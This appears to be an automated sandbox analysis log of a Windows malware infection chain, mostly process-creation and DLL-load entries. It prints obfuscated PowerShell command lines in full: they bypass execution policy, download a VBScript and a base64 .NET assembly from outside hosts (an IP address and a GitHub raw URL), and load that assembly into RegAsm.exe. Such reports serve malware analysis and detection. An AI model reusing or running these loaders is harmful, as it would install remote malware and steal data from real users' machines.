                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wjmxrdtjldezpaqjtnqsed"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA28.tmp" "c:\Users\user\AppData\Local\Temp\qjwmez35\CSC8672896636494697B648CFD8C23C5D6C.TMP"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMzQsW0NIYXJdMzYpIHwgJiggJEVOVjpDT21zUEVDWzQsMjYsMjVdLUpPSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'2'+'}'+'u'+'rl'+' '+'= {0}https://raw.gi'+'t'+'hu'+'buserco'+'ntent.co'+'m'+'/NoDet'+'e'+'ctOn/N'+'oDetec'+'tOn/'+'re'+'f'+'s/hea'+'ds/mai'+'n/Deta'+'hNoth-V'+'.txt{0};'+' {'+'2}base'+'64Content = (New-'+'Object'+' Sys'+'tem.N'+'e'+'t'+'.W'+'e'+'bClient).Do'+'wn'+'loa'+'d'+'String({2'+'}u'+'rl)'+'; {'+'2'+'}'+'binaryContent = ['+'S'+'y'+'stem'+'.Co'+'n'+'v'+'ert]::Fro'+'mBase64St'+'ring({'+'2'+'}base'+'64Co'+'nt'+'ent); {'+'2}asse'+'mbly = [Re'+'flect'+'ion'+'.Ass'+'embl'+'y'+']::'+'Load({2}binar'+'yCo'+'n'+'tent); ['+'dn'+'lib.IO.Home]::VAI({1}'+'txt.'+'V'+'VBGF'+'R'+'/7'+'9'+'/02.'+'02'+'2.3.2'+'91/'+'/'+':'+'ptth{1},'+' {'+'1}'+'desat'+'ivado{1'+'}, {1}'+'d'+'esati'+'v'+'ado{1}, '+'{1'+'}desa'+'tivado{'+'1},'+' '+'{1}RegAsm{1},'+' {1}{1},{1}{1})') -f[CHar]39,[CHar]34,[CHar]36) | &( $ENV:COmsPEC[4,26,25]-JOIN'')"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
